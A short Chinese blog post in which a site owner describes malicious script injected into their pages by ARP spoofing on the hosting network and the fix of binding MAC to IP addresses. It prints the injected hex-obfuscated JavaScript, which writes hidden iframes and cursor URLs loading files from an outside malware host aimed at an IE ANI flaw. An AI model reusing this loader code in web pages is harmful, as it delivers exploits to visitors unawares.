script src=http://fuck.ns2go.com/dir/index_pic/1.js/script
于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:
代码如下:
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d"x43x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x31x2ex67x69x66'x29"x3e");
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d"x43x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x32x2ex67x69x66'x29"x3ex3c/x44x49x56x3ex3c/x44x49x56x3e");
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x30x36x30x31x34x2ex68x74x6d x77x69x64x74x68x3dx31 x68x65x69x67x68x74x3dx31x3ex3c/x69x66x72x61x6dx65x3e");
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x74x6ax2ex68x74x6d x77x69x64x74x68x3dx30 x68x65x69x67x68x74x3dx30x3ex3c/x69x66x72x61x6dx65x3e")
在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
猜你喜欢